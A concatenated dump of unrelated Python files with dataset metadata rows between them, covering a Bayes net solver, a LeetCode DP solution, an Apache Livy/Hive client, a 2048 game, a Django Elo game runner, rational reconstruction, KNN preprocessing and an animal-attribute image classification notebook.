while line_num < len(lines) and lines[line_num] != '***' and lines[line_num] != '******':
prob_tab = lines[line_num].split(' ')
list_temp = []
for i in range(1, len(prob_tab)):
if prob_tab[i] == '+':
list_temp.append(True)
elif prob_tab[i] == '-':
list_temp.append(False)
else:
print 'input wrong'
t1 = ()
t1 = tuple(list_temp)
cpt[t1] = float(prob_tab[0])
line_num += 1
BayesNet.append(('chance', X, parents, cpt))
return Querys, BayesNet
# ______________________________________________________________________________
def main():
qs , bn = readfile()
bayesnet = BayesNet(bn)
output = []
for q in qs:
output.append(elimination_ask_kinds(q, bayesnet))
with open('output.txt', 'wb') as outfile:
outfile.write('\n'.join(output))
main()
| true |
5e6191c36648e965461581c30ea7797b20ad6c9a | Python | RishikaMachina/DP-3 | /Problem_2.py | UTF-8 | 704 | 3.015625 | 3 | [] | no_license | # Runs on Leetcode
# Runtime - O(m*n)
# Space - O(n) where m is # of rows and n is # of cols
class Solution:
def minFallingPathSum(self, A: List[List[int]]) -> int:
if not A:
return 0
rows = len(A)
cols = len(A[0])
dp = A[0]
for i in range(1,rows):
pre = dp[:]
for j in range(cols):
dp[j] = A[i][j]
if j == 0:
dp[j] += min(pre[j], pre[j+1])
elif j == cols-1:
dp[j] += min(pre[j-1], pre[j])
else:
dp[j] += min(min(pre[j-1],pre[j]), pre[j+1])
return min(dp)
| true |
2728ce51d2d13b84df90c05fd282b8035cfd9767 | Python | seungwookim/LivyClientPython | /livy_hive_client.py | UTF-8 | 9,413 | 2.515625 | 3 | [] | no_license | import json, requests, textwrap, time, random
# json object hooker class
class JsonObject:
def __init__(self, d):
self.__dict__ = d
#json_data = json.loads(data, object_hook=JsonObject)
#requests.get('http://httpbin.org', hooks=dict(response=print_url))
#list(filter(lambda x:x=='idle' ,self.alive_sess_obj))
class LivyHiveClientManager:
def __init__(self, s_num):
self.max_sess_num = s_num
self.host = "http://481bf68ee6d9:8998"
self.hdfs_path = "/home/dev/hadoop"
self.headers = {'Content-Type': 'application/json'}
self.alive_sess_obj = None
self.alive_sess_cnt = None
self.alive_sess_list = []
self.alive_sess_state = []
self.avail_sess_list = []
def create_session(self):
"""
create session, get session id form return, run long code with that session
:return:
"""
self.check_alive_sessions()
if(self.max_sess_num < self.alive_sess_cnt):
print("exceed max session number")
return False
data = {'kind': 'pyspark',
"name": "tensormsa",
"executorCores": 1,
"executorMemory": "512m",
"driverCores": 1,
"driverMemory": "512m"}
r = requests.post(self.host + "/sessions", data=json.dumps(data), headers=self.headers)
return r.json()['id']
def check_alive_sessions(self):
"""
check alive sessions info
:return:
"""
self.alive_sess_list[:] = []
self.alive_sess_cnt = 0
self.alive_sess_obj = None
resp = requests.get(self.host + "/sessions/" , headers=self.headers)
self.alive_sess_obj = json.loads(resp.content, object_hook=JsonObject)
self.alive_sess_cnt = len(self.alive_sess_obj.sessions)
if(self.alive_sess_cnt > 0):
for i in range(0 , self.alive_sess_cnt):
self.alive_sess_list.append(self.alive_sess_obj.sessions[i].id)
def get_available_sess_id(self):
"""
get random one available (state is idle) session
:return:
"""
self.avail_sess_list[:] = []
resp = requests.get(self.host + "/sessions/" , headers=self.headers)
self.alive_sess_obj = json.loads(resp.content, object_hook=JsonObject)
self.alive_sess_cnt = len(self.alive_sess_obj.sessions)
if(self.alive_sess_cnt > 0):
for i in range(0 , self.alive_sess_cnt):
if(self.alive_sess_obj.sessions[i].state == 'idle'):
self.avail_sess_list.append(self.alive_sess_obj.sessions[i].id)
print("list of available sessions : {0} " .format(self.avail_sess_list))
def delete_all_sessions(self):
"""
delete all sessions
:return:
"""
print(self.alive_sess_list)
for sess_id in self.alive_sess_list:
print(sess_id)
r = requests.delete(self.host + "/sessions/" + str(sess_id), headers=self.headers)
print(r.json())
def print_all(self):
"""
delete all sessions
:return:
"""
print("host : {0}".format(self.host))
print("headers : {0}".format(self.headers))
print("alive_sess_obj : {0}".format(self.alive_sess_obj))
print("alive_sess_cnt : {0}".format(self.alive_sess_cnt))
print("alive_sess_list : {0}".format(self.alive_sess_list))
def create_table_parq(self, table_name, json_data):
"""
action for create table with json request
:return:
"""
self.get_available_sess_id()
json_data = [{"name":"Andy", "univ":"snu"}]
data = {
'code': ''.join(['from pyspark.sql import SQLContext, DataFrameWriter, DataFrame, HiveContext\n',
'sqlContext = SQLContext(sc)\n',
'df_writer = sqlContext.createDataFrame(', str(json_data) ,').write\n',
'df_writer.parquet("' , str(self.hdfs_path), "/", table_name , '", mode="overwrite", partitionBy=None)'
#'df_writer.saveAsTable("' , table_name , '",format="parquet", mode="overwrite" , partitionBy=None)'
# 'df_writer = DataFrameWriter(df)\n',
# 'df_writer'
#'df.write.format("parquet").save("' ,str(self.hdfs_path), "/", table_name , '.parquet")\n'
# 'result = df_writer.saveAsTable("' ,
# table_name ,'", format="parquet", mode="overwrite"',
# ', path="' ,str(self.hdfs_path), "/", table_name, ' " ' ,
# ')\n',
# 'result'
])
}
print("request codes : {0} ".format(data))
resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
temp_resp = json.loads(resp.content, object_hook=JsonObject)
result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
print("result : {0} ".format(result))
def create_table_hive(self, table_name, json_data):
"""
action for create table with json request
:return:
"""
self.get_available_sess_id()
json_data = [{"name":"Andy", "univ":"snu"}]
data = {
'code': ''.join(['from pyspark.sql import SQLContext, DataFrameWriter, DataFrame, HiveContext\n',
'hiveContext = HiveContext(sc)\n',
'df_writer = hiveContext.createDataFrame(', str(json_data) ,').write\n',
'df_writer.saveAsTable("' , table_name , '",format="parquet", mode="overwrite" , partitionBy=None)'
])
}
print("request codes : {0} ".format(data))
resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
temp_resp = json.loads(resp.content, object_hook=JsonObject)
result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
print("result : {0} ".format(result))
def get_response(self, session_id, statements_id):
"""
retry till running finished
:return:
"""
resp = requests.get(self.host + "/sessions/" + str(session_id) + "/statements/" + str(statements_id), headers=self.headers)
response_obj = json.loads(resp.content, object_hook=JsonObject)
if(response_obj.state == 'running'):
time.sleep(1)
return self.get_response(session_id, statements_id)
else:
print(resp.json())
return resp.json()
#print("response : {0}".format(self.response_obj.statements[len(self.response_obj.statements)-1].output.evalue))
def query_sql(self, query_str):
"""
get data from hive table
:return:
"""
self.get_available_sess_id()
json_data = [{"name":"Andy", "univ":"snu"}]
data = {
'code': ''.join(['from pyspark.sql import HiveContext\n',
'hiveContext = HiveContext(sc)\n',
'result = hiveContext.sql("' , str(query_str) ,'")\n'
'result'
])
}
print("request codes : {0} ".format(data))
resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
temp_resp = json.loads(resp.content, object_hook=JsonObject)
result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
print("result : {0} ".format(result))
def query_sql_test(self):
"""
action for create table with json request
:return:
"""
self.get_available_sess_id()
data = {
'code': ''.join(['from pyspark.sql import SQLContext\n',
'sqlContext = SQLContext(sc)\n',
'df = sqlContext.read.load("/home/dev/spark/examples/src/main/resources/users.parquet")\n',
'df.registerAsTable("users")',
'result = sqlContext.sql("SELECT * FROM users").collect()',
'result'
])
}
print("request codes : {0} ".format(data))
resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
temp_resp = json.loads(resp.content, object_hook=JsonObject)
result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
print("result : {0} ".format(result))
livy_client = LivyClientManager(2)
#livy_client.create_session()
#livy_client.check_alive_sessions()
#livy_client.delete_all_sessions()
#livy_client.get_available_sess_id()
#livy_client.create_table_parq("abcd", None)
livy_client.create_table_hive("abcd", None)
#livy_client.get_response(8, 102)
#livy_client.print_all()
#livy_client.query_sql("select * from abcd")
#livy_client.query_sql_test() | true |
3374cd30315d99b0b31d5236c252d3db7a912435 | Python | nacho1415/Toy_Blockchain | /OneDrive/바탕 화면/알고리즘/1000~2000/1871.py | UTF-8 | 204 | 3.609375 | 4 | [] | no_license | sum = 0
for i in range(int(input())):
item_a, item_b = input().split("-")
for i in range(len(item_a)):
sum = sum + ord(item_a[i])*(26**(2-i))
print(sum)
print(sum)
sum = 0
| true |
4ee9acc8bbc45cb37c1210f315c00cdd08a771b2 | Python | FlyingUnicorn/.emacs.d | /scripts/getSrcHdr.py | UTF-8 | 1,744 | 2.71875 | 3 | [] | no_license | import os
import sys
lst_ext_src = ['c', 'cpp', 'cc']
lst_ext_hdr = ['h']
lst_dir_src = ['src', 'Src', 'source', 'Source', 'sources', 'Sources']
lst_dir_hdr = ['inc', 'Inc', 'include', 'Include', 'includes', 'Includes']
def assemble_path(f_base, f_dir, f_name, f_ext):
f_target = '{}/{}/{}.{}'.format(f_base, f_dir, f_name, f_ext)
#print('exist: {} target: {}'.format(os.path.isfile(f_target), f_target))
return (os.path.isfile(f_target), f_target)
def find_src_hdr(path_buffer):
try:
#print(' -- {} --'.format(path_buffer))
f_ext = path_buffer.split('.')[-1]
f_name = '.'.join(path_buffer.split('.')[:-1]).split('/')[-1]
f_split = path_buffer.split('/')
f_dir = f_split[-2]
f_base = '/'.join(f_split[:-2])
#print('base: {}'.format(f_base))
#print('ext: {}'.format(f_ext))
#print('dir: {}'.format(f_dir))
#print('name: {}'.format(f_name))
lst_dir_asso = [f_dir]
lst_ext_asso = []
# source
if f_ext in lst_ext_src:
if f_dir in lst_dir_src:
lst_dir_asso.extend(lst_dir_hdr)
lst_ext_asso = lst_ext_hdr
#header
elif f_ext in lst_ext_hdr:
if f_dir in lst_dir_hdr:
lst_dir_asso.extend(lst_dir_src)
lst_ext_asso = lst_ext_src
else:
return
for dir_asso in lst_dir_asso:
for ext in lst_ext_asso:
(found, target) = assemble_path(f_base, dir_asso, f_name, ext)
if found:
sys.stdout.write('{}'.format(target))
return
except:
pass
return
if __name__ == '__main__':
find_src_hdr(sys.argv[1])
| true |
e49285ef8841d5b178ded0a2d30c457eba1c0e10 | Python | ANazaret/Santa20-Local-Contest | /app/management/commands/run_games.py | UTF-8 | 4,693 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive | import numpy as np
from kaggle_environments import make
from django.utils import timezone
from django.core.management.base import BaseCommand
from app.models import Game, Agent, GameStatus, GameResult
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument(
"-n", "--num_games", default=np.inf, type=int, dest="num_games"
)
parser.add_argument(
"-t", "--trigger", default="unkwown", type=str, dest="trigger"
)
parser.add_argument("-a", "--agent", default="", type=str, dest="agent")
def handle(self, *args, **options):
num_games = options["num_games"]
agent_id_list = list(
Agent.objects.filter(file__isnull=False).values_list("id", flat=True)
)
if len(agent_id_list) < 2:
self.stdout.write(self.style.ERROR("There must be at least 2 agents."))
return
c = 1
env = make("mab", debug=True)
while c <= num_games:
left_agent_id, right_agent_id = choice_agents_for_game(
agent_id_list, options
)
try:
game = run_game(env, left_agent_id, right_agent_id, options)
except Exception as e:
self.stdout.write(self.style.ERROR(e))
return
self.stdout.write(f"{c} - {game}")
c += 1
def choice_agents_for_game(agent_id_list, options):
if options["agent"]:
agent = Agent.objects.get(name=options["agent"])
possibilities = agent_id_list.copy()
possibilities.remove(agent.id)
return agent.id, np.random.choice(possibilities, size=1)
else:
return np.random.choice(agent_id_list, size=2, replace=False)
def run_game(env, left_agent_id, right_agent_id, options):
trigger = options["trigger"]
if left_agent_id == right_agent_id:
raise ValueError("Agents must be different")
left_agent = Agent.objects.filter(id=left_agent_id).first()
if not left_agent:
raise ValueError(f"Can't find agent with id {left_agent_id}.")
right_agent = Agent.objects.filter(id=right_agent_id).first()
if not right_agent:
raise ValueError(f"Can't find agent with id {right_agent_id}.")
env.reset()
game = Game.objects.create(
left_agent=left_agent,
right_agent=right_agent,
left_current_rating=left_agent.rating,
right_current_rating=right_agent.rating,
configuration=env.configuration,
trigger=trigger,
)
env.run([left_agent.file.path, right_agent.file.path])
num_steps = len(env.steps) - 1
left_actions = np.zeros(num_steps, dtype=np.uint8)
right_actions = np.zeros(num_steps, dtype=np.uint8)
left_rewards = np.zeros(num_steps, dtype=np.uint16)
right_rewards = np.zeros(num_steps, dtype=np.uint16)
for i, s in enumerate(env.steps[1:]):
left_env, right_env = s
left_actions[i], right_actions[i] = left_env["action"], right_env["action"]
left_rewards[i], right_rewards[i] = left_env["reward"], right_env["reward"]
left_total_reward, right_total_reward = left_rewards[-1], right_rewards[-1]
if left_total_reward > right_total_reward:
result = GameResult.LEFT_WON
elif left_total_reward < right_total_reward:
result = GameResult.RIGHT_WON
else:
result = GameResult.DRAW
left_new_score, right_new_score = find_new_scores(
left_agent.rating, right_agent.rating, result
)
game.initial_thresholds = np.array(
env.steps[0][0]["observation"]["thresholds"], dtype=np.uint8
)
game.left_actions = left_actions
game.right_actions = right_actions
game.left_rewards = left_rewards
game.right_rewards = right_rewards
game.result = result
game.status = GameStatus.FINISHED
game.left_new_rating = left_new_score
game.right_new_rating = right_new_score
game.finished = timezone.now()
game.save()
left_agent.rating = left_new_score
left_agent.save(update_fields=["rating"])
right_agent.rating = right_new_score
right_agent.save(update_fields=["rating"])
return game
def find_new_scores(ra, rb, result, k=32):
ea, eb = expected_scores(ra, rb)
if result == GameResult.LEFT_WON:
sa, sb = 1, 0
elif result == GameResult.RIGHT_WON:
sa, sb = 0, 1
elif result == GameResult.DRAW:
sa, sb = 0.5, 0.5
else:
raise ValueError(f"Unknown result '{result}'.")
return ra + k * (sa - ea), rb + k * (sb - eb)
def expected_scores(a, b):
qa = 10 ** (a / 400)
qb = 10 ** (b / 400)
s = qa + qb
return qa / s, qb / s
| true |
2b3a7d0c28d1bf7d4400b0e5558b0527a96af781 | Python | NQMTri/NumberTheory | /RationalReconstruction.py | UTF-8 | 1,950 | 3.359375 | 3 | [] | no_license | import sys
import math
from random import randrange
from utilities import *
from EffectiveThueLemma import *
def getZ(value):
s = str(value)
p10 = 1
if s[0] != '0':
p10 = 10
for i in range(1, len(s)):
if s[i] == '.':
break
p10 *= 10
z = []
first = int(s[0] == '0')
for i in range(first, len(s)):
if s[i] != '.':
z.append(int(s[i]))
return (p10, z)
def Theorem4_9(n, b, R):
if R >= n:
raise ValueError("r* >= n")
if b < 0 or b >= n:
raise ValueError("b < 0 or b >= n")
r, rr = n, b # r0, r1
s, ss = 1, 0 # s0, s1
t, tt = 0, 1 # t0, t1
if r < R:
return (r, s, t)
if rr < R:
return (rr, ss, tt)
while rr != 0:
q = r/rr
rrr = r % rr
r, s, t, rr, ss, tt = rr, ss, tt, rrr, (s-ss*q), (t-tt*q)
if rr < R:
return (rr, ss, tt)
return None
def gcd(a, b):
if b == 0:
return a
return gcd(b, a%b)
def RationalReconstruction(value, M = int(1e9)):
# check if value is already an integer
if value.is_integer():
return (value, 1)
# get additional 10^x and z array
p10, z = getZ(value)
print(z)
k = len(z)
# 1. Compute n = 10^k and b = sum(z(i-1) * 10^(k-i)) with i = 1..k
n = pow(10, k)
b = 0
for i in range(1, k+1):
b += z[i-1] * pow(10, k-i)
# make sure 10^k > 2(M^2)
while M >= 10 and 2*(M**2) >= n:
M /= 10
# 2. Run the extended Euclidean algorithm on input n, b to obtain EEA(n, b)
# and then apply Theorem 4.9 with n, b, and r* = t* = M to obtain the values r', s', t'.
EEA(n, b)
print(n, b, M)
rr, ss, tt = Theorem4_9(n, b, M)
# 3. Output the rational number -s'/t'
if tt < 0:
ss, tt = -ss, -tt
ss *= p10
g = gcd(abs(ss), abs(tt))
ss /= g
tt /= g
return (-ss, tt)
def main():
if (len(sys.argv) < 2):
return
value = float(sys.argv[1])
M = int(1e9)
if len(sys.argv) > 2:
M = int(sys.argv[2])
p, q = RationalReconstruction(value, M)
print("p = %ld" %(p))
print("q = %ld" %(q))
print("p/q = %.20lf" %(1.0*p/q))
print("val = %.20lf" %(value))
main() | true |
4a4e41b2c0f58302319c1b02333c01aacd4fe59f | Python | littleyellowfishes/2018-python | /2048.py | UTF-8 | 6,901 | 3.109375 | 3 | [] | no_license | import random
import sys
from numpy import *
c = 0
r = 0
m = [[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
highscore = 0
def g():
global y
y = int(input("number:"))
while y <= 1:
print("Invaild input, you can only input between 2 and 10")
y = int(input("number:"))
def exit():
sys.exit()
def display(m, score, highscore): # display the interface and score
"""
:param m: the game matrix
:param score: to calculate the total score
"""
print('{0:4} {1:4} {2:4} {3:4}'.format(m[0][0], m[0][1], m[0][2], m[0][3]))
print('{0:4} {1:4} {2:4} {3:4}'.format(m[1][0], m[1][1], m[1][2], m[1][3]))
print('{0:4} {1:4} {2:4} {3:4}'.format(m[2][0], m[2][1], m[2][2], m[2][3]))
print('{0:4} {1:4} {2:4} {3:4}'.format(m[3][0], m[3][1], m[3][2], m[3][3]))
print("Total score: ", score)
print("high score:", highscore)
def init(m): # initial the matrix
"""
:param m: the initial game matrix
"""
g()
for r in range(4): # random generate 0, 2 and 4 to start the game but 4 will be more rare
m[r] = [random.choice([0, 0, 0, 0, y, y, y, y**2])for x in m[r]]
def align(matrix, direction): # align non-zero numbers
"""
:param matrix: the matrix row or col
:param direction: the direction that the system can accept
"""
for r in range(matrix.count(0)): # found frequency of zero
matrix.remove(0) # remove all zeros
zeros = [0 for x in range(4 - len(matrix))] # add zeros to non-zero side
if direction == 'left':
matrix.extend(zeros)
if direction == 'right':
matrix[:0] = zeros
def merge(matrix, direction): # when the user move, if the number are the same,
"""
:param matrix: the game matrix will be merge
:param direction:
:return: true
"""
score = 0 # merge them and return the added score, false otherwise
if direction == 'left':
for r in [0, 1, 2]:
if matrix[r] == matrix[r + 1] != 0: # these two number can be merge
matrix[r] *= y # number will multiply itself
matrix[r + 1] = 0 # i + 1 return zero
score += matrix[r] # score plus the new number
return {'move': True, 'score': score}
if direction == 'right':
for r in [3, 2, 1]:
if matrix[r - 1] == matrix[r] != 0:
matrix[r] *= y
matrix[r - 1] = 0
score += matrix[r]
return {'move': True, 'score': score}
return{'move': False, 'score': score}
def handle(matrix, direction): # handle one row/column, get the value of the row/column and return the score
"""
:param matrix: the matrix that will be manipulated
:param direction: different direction that system accepted
:return: total score
"""
global result
totalscore = 0
align(matrix, direction)
result = merge(matrix, direction)
totalscore += result['score']
return totalscore
def operation(matrix): # After user move, recompute the matrix value and return the score
"""
:param matrix: the game matrix
:return: the state of the game and score
"""
global r, c, m
totalscore = 0 # left and up both use 'left', down and right both use 'right'
gameOver = False
direction = 'left'
o = input('operator:')
if o in ['a', 'A']: # left
direction = 'left'
for r in range(4):
totalscore += handle(matrix[r], direction)
elif o in ['d', 'D']: # right
direction = 'right'
for r in range(4):
totalscore += handle(matrix[r], direction)
elif o in ['w', 'W']: # up
matrix = numpy.transpose(matrix) # transpose the matrix and then left will equal to up
matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
direction = 'left'
for r in range(4):
totalscore += handle(matrix[r], direction)
matrix = numpy.transpose(matrix) # transpose the matrix and then left will equal to up
matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
m = matrix
elif o in ['s', 'S']: # down
matrix = numpy.transpose(matrix) # transpose the matrix and then right will equal to down
matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
direction = 'right'
for r in range(4):
totalscore += handle(matrix[r], direction)
matrix = numpy.transpose(matrix) # transpose the matrix and then left will equal to up
matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
m = matrix
elif o in ['Exit']:
exit()
elif o in ['Restart']:
print('The game has been restarted')
game()
else:
print(' Invalid input, please enter character in [A, S, W, D, Exit, Restart] or the lower case')
return{'gameOver': gameOver, 'score': totalscore}
b = 0 # blank space
for p in matrix:
b += p.count(0)
# print(f'b is equal to: {b}')
if b == 0 and (matrix[r][c - 1] != matrix[r][c] or matrix[r - 1][c] != matrix[r][c]):
# neither blank spaces nor two same numbers, game over
gameOver = True
return{'gameOver': gameOver, 'score': totalscore}
newnum = random.choice([y, y, y, y**2]) # still 4 will be rare
k = random.randrange(1, b + 1)
u = 0
for r in range(4):
for c in range(4):
if matrix[r][c] == 0:
u += 1
if u == k:
m[r][c] = newnum
break
# print('Type of total score is: ')
# print(type(totalscore))
# print(totalscore)
return{'gameOver': gameOver, 'score': totalscore}
def comparehighscore(totalscore, highscore):
if totalscore > highscore:
return totalscore
else:
return highscore
def game():
global highscore
init(m)
score = 0
print('Input character A(left) S(down) W(up) D(right) Exit Restart')
while True:
highscore = comparehighscore(score, highscore)
display(m, score, highscore)
result = operation(m)
# print('result equals: ')
# print(result)
score += result['score']
# print(f'Your maximum value is: {y**11}')
if result['gameOver']:
print('Game Over, try next time!')
print('Your total score:', score)
game()
elif m[r][c] >= y**11:
print('Game over, you win!')
print('Your total score:', score)
game() | true |
8c84de171e957ddde3d67235e4de0e0e47e9eb5b | Python | MayukhSobo/ML | /KNN/preprocess.py | UTF-8 | 6,384 | 3.28125 | 3 | [
"MIT"
] | permissive | from abc import ABC, abstractmethod
from math import ceil
from warnings import warn
import numpy as np
import pandas as pd # For all data processing
class Gather(ABC):
"""
Gather module collects all the
data passed through its constructor
and performs the following operations.
1. Head (n = 5)
2. Tail (n = 5)
3. Size (Rows and Columns)
4. Shuffle the dataset (n_rounds times)
5. Split the dataset in 2 parts (train, cross-validation)
6. Train
7. Cross-Validation
8. feature & label splitting
"""
SHUFFLED = False
def __init__(self, path, colnames=None, typ='csv'):
"""
// TODO implement later on
"""
if typ == 'csv':
# If the data is in csv
if not colnames:
self._data = pd.read_csv(path)
else:
self._data = pd.read_csv(path, names=colnames, header=None)
self._cv = None
self._train = None
self.class_labels = None
@property
def head(self):
"""
Returns the internal dataframe head
"""
return self._data.head(5)
@property
def tail(self):
"""
Returns the internal dataframe tail
"""
return self._data.tail(5)
@property
def size(self):
"""
Returns the length of the dataframe
"""
ret = "Rows/Entries: {}\nColumns/Variables: {}".format(
self._data.shape[0], self._data.shape[1])
return ret
@property
def train(self):
"""
Return the train dataset
"""
return self._train
@property
def test(self):
"""
Return the cross-validation dataset
"""
return self._cv
def _shuffle(self, n_rounds=10, copy=False):
"""
Shuffle the dataset and if
copy = False stores back the result
into the dataframe or else returns a
new dataframe
:param n_rounds: Number of times dataset is shuffled
:param copy: Bool, if new dataset is created
:return: pd.DataFrame or None
"""
nrows = self._data.shape[0]
index = np.arange(nrows)
for _ in range(n_rounds):
np.random.shuffle(index)
if copy:
Gather.SHUFFLED = True
return self._data.iloc[index, :].reset_index(drop=True)
else:
Gather.SHUFFLED = True
self._data = self._data.iloc[index, :].reset_index(drop=True)
return
def _split(self, split_ratio=0.4, dataset=None):
"""
This splits the dataset into
two parts for training and testing
to avoid overfitting after ML fitting.
"""
# Pycharm Linter gives unnecessary warning here. Please ignore!
if not isinstance(dataset, pd.core.frame.DataFrame):
dataSet = self._data
else:
dataSet = dataset
if not Gather.SHUFFLED:
error_msg = 'Splitting the dataset without shuffling!!'
warn(error_msg, RuntimeWarning, stacklevel=2)
split_index = ceil(dataSet.shape[0] * (1 - split_ratio))
self._train = dataSet.iloc[0: split_index, :].reset_index(drop=True)
self._cv = dataSet.iloc[split_index:, :].reset_index(drop=True)
def train_test_split(self, label, n_rounds=10, copy=False, split_ratio=0.4, reject_cols=None, numpy_array=True):
"""
Shuffle the data for ```n_rounds``` amount of times, split the
dataset into train and test and then return feature and labels for
both train and test.
"""
all_features = set(self._data.columns.values)
# The following feature can be better implemented using OrderedSet
# however python doesn't support OrderedSet natively yet.
# // However https://stackoverflow.com/questions/1653970/does-python-have-an-ordered-set this may help
# First create the feature and label cols
if isinstance(reject_cols, set):
final_reject_list = reject_cols.add(label)
else:
final_reject_list = {label}
feature_cols = list(all_features - final_reject_list)
label_col = label
# Split and Shuffle the dataset
if not copy:
# Use the same dataset
self._shuffle(n_rounds, copy)
self._split(split_ratio)
else:
# Create a new dataset
shuffled_data = self._shuffle(n_rounds, copy)
self._split(split_ratio, shuffled_data)
X_train = self.train.loc[:, feature_cols]
X_test = self.test.loc[:, feature_cols]
y_train = self.train.loc[:, label_col]
y_test = self.test.loc[:, label_col]
self.sanity_check_classification(label_col, categorical_cols=[label_col])
if numpy_array:
return X_train.as_matrix(), X_test.as_matrix(), y_train.values, y_test.values
else:
return X_train, X_test, y_train, y_test
def sanity_check_classification(self, label, categorical_cols):
"""
Performs the sanity check of the split
dataset and verifies the following characteristics
1. Check if both the training and testing dataset
has all the possible columns in them
2. Label encoding for all the columns
3. Stores encoding information for the Output classes
4. Dummy Encoding for dummy variables
:return: Boolean (True | False) -> indicates if the sanity_check
is successfully performed
"""
# Check 1
check_1 = False
train_labels = self.train.loc[:, label]
test_labels = self.test.loc[:, label]
all_labels = train_labels.append(test_labels).reset_index(drop=True)
self.class_labels = all_labels.unique()
for each_label in self.class_labels:
# Sorry for such a long line
if each_label not in train_labels.tolist() and each_label not in test_labels.tolist():
raise RuntimeError('Splitting was not good!!')
else:
check_1 = True
@abstractmethod
def apply(self, kind=None, prediction_mode='absolute', classification=True):
# Currently ensembles are not supported
pass
| true |
b7e42971319ee8c86fb9607419eb70b815de7484 | Python | MuLx10/DL3 | /DL3.py | UTF-8 | 9,267 | 3.4375 | 3 | [] | no_license |
# coding: utf-8
# ### Importing libraries
# In[10]:
import numpy as np
import pandas as pd
#import seaborn as sns
#import matplotlib.pyplot as plt
from sklearn.datasets import load_files
from glob import glob
#get_ipython().magic(u'matplotlib inline')
# ### Data Exploration
# In[11]:
# Reading the train and test meta-data files
train = pd.read_csv('data/train.csv')
test = pd.read_csv('data/test.csv')
# In[12]:
train.head()
# In[15]:
# Shape of training and test datasets
print ('Training dataset consists of {} images with {} attributes'.format(train.shape[0], train.shape[1]-1))
# Shape of training and test datasets
print ('Testing dataset consists of {} images.'.format(test.shape[0]))
# Let's have a look at the columns of the training data.
# In[16]:
print('Columns in the dataset:\n\n', train.columns)
# ### Data Visualization
#
# Now we will visualize our data to get a better understanding of it.
# We will begin with visualizing the distribution of the labels in the training data.
# In[21]:
cols = list(train.columns)
cols.remove('Image_name')
cols.sort()
# In[22]:
count_labels = train[cols].sum()
# In[24]:
count_labels.sort_values(inplace=True)
# From the figure below, we can see that there are 85 different attributes/ labels and Attrib_21 is common in almost all animals while Attrib_66 is rare.
# In[25]:
'''
plt.figure(figsize=(18, 8))
ax = sns.barplot(x=count_labels.index, y=count_labels.values)
ax.set_xticklabels(labels=count_labels.index,rotation=90, ha='right')
ax.set_ylabel('Count')
ax.set_xlabel('Attributes/ Labels')
ax.title.set_text('Label/ Attribute distribution')
plt.tight_layout()
'''
# In[26]:
label_data = np.array(train[cols])
# Next we will compute the co-occurrence matrix for the labels.
# In[27]:
# Compute the cooccurrence matrix
cooccurrence_matrix = np.dot(label_data.transpose(), label_data)
print('\n Co-occurence matrix: \n', cooccurrence_matrix)
# In[28]:
# Compute the cooccurrence matrix in percentage
# Refrence: https://stackoverflow.com/questions/20574257/constructing-a-co-occurrence-matrix-in-python-pandas/20574460
cooccurrence_matrix_diagonal = np.diagonal(cooccurrence_matrix)
with np.errstate(divide = 'ignore', invalid='ignore'):
cooccurrence_matrix_percentage = np.nan_to_num(np.true_divide(cooccurrence_matrix, cooccurrence_matrix_diagonal))
# In[29]:
print('\n Co-occurrence matrix paercentage: \n', cooccurrence_matrix_percentage)
# From the plot of the co-occurence matrix (below), we can see which labels(or attributes) genreally occur together.
# In[30]:
'''
ax = plt.figure(figsize=(18, 12))
sns.set(style='white')
# Generate a custom diverging colormap
cmap = sns.diverging_palette(200, 10, as_cmap=True)
# Draw the heatmap with the mask and correct aspect ratio
sns.heatmap(cooccurrence_matrix_percentage, cmap=cmap, center=0, square=True, linewidths=0.15, cbar_kws={"shrink": 0.5})
plt.title('Co-occurrence Matrix of the Labels')
'''
# We define the paths to the image folders.
# In[31]:
TRAIN_PATH = 'data/train/'
TEST_PATH = 'data/test/'
# In[32]:
img_path = TRAIN_PATH+str(train.Image_name[0])
# We import the OpenCV and Python Image library for image manipulation.
# In[33]:
from PIL import Image
import cv2
# In[34]:
Image.open(img_path)
# The computer cannot see shapes or colors. It reads each image as an array of numbers.
# In[35]:
img = cv2.imread(img_path)
img
# In[36]:
# Shape of each image
img.shape
# In[38]:
# Extracting label columns
label_cols = list(set(train.columns) - set(['Image_name']))
label_cols.sort()
# In[39]:
# Extracting labels corresponding to image at the zeroth index of the training dataset.
labels = train.iloc[0][2:].index[train.iloc[0][2:] == 1]
# We plot the Animal and the attributes/ labels corresponding to it.
# In[43]:
'''
txt = 'Labels/ Attributes: ' + str(labels.values)
ax = plt.figure(figsize=(10, 10))
ax.text(.5, .05, txt, ha='center')
plt.imshow(img)
'''
# In the image above we can see a Rhinoceros and all the attributes associated with him.
# ### Data Preprocessing
#
# Next, we will preprocess our image data before supplying it to the training model.
# In[44]:
from tqdm import tqdm
def read_img(img_path):
img = cv2.imread(img_path)
img = cv2.resize(img, (128, 128))
return img
# The above function reads an image and resizes it to 128 x 128 dimensions and returns it.
# In[28]:
#temp = train.sample(frac=0.3)
# In[29]:
#train = temp.reset_index(drop=True)
# In[30]:
train_img = []
for img_path in tqdm(train.Image_name.values):
train_img.append(read_img(TRAIN_PATH + img_path))
# In[31]:
import gc
# In[32]:
# Convert the image data into an array.
# Since the range of color(RGB) is in the range of (0-255).
# Hence by dividing each image by 255, we convert the range to (0.0 - 1.0)
X_train = np.array(train_img, np.float32) / 255.
# In[33]:
del train_img
